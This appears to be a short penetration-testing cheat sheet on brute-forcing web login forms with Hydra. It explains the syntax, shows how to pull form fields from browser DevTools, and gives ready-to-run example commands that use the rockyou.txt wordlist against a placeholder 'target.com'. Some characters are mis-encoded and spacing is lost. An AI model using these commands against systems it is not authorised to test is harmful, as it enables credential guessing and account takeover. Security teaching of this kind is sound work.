Hydra
Web Login Brute-Force
Syntax:
hydra -l USERNAME -P WORDLIST TARGET PROTOCOL "PATH:POST-DATA:FAILURE-CONDITION" -t THREADS-l USERNAMEβ Known username (ornoneif only password field exists)-P WORDLISTβ Path to password listTARGETβ Domain or IPPROTOCOLβhttp-post-formorhttps-post-formPATHβ Login endpointPOST-DATAβ Form parameters with^PASS^placeholderFAILURE-CONDITIONβF=error messageorS=success message-t 64β Threads (adjust based on target)
Capture the login POST request via Browser DevTools (F12 β Network)
Extract the following inputs for Hydra
Target URL: The specific form action endpoint.Parameters: The field names required to inject^USER^and^PASS^.Fail String: The exact error message text.
Password-only form Example
hydra -l none -P rockyou.txt target.com https-post-form "/db/index.php:password=^PASS^&login=Submit:F=Invalid password" -t 64Username + Password form:
hydra -l admin -P rockyou.txt target.com http-post-form "/login.php:username=admin&password=^PASS^:F=Invalid Password" -t 64Last updated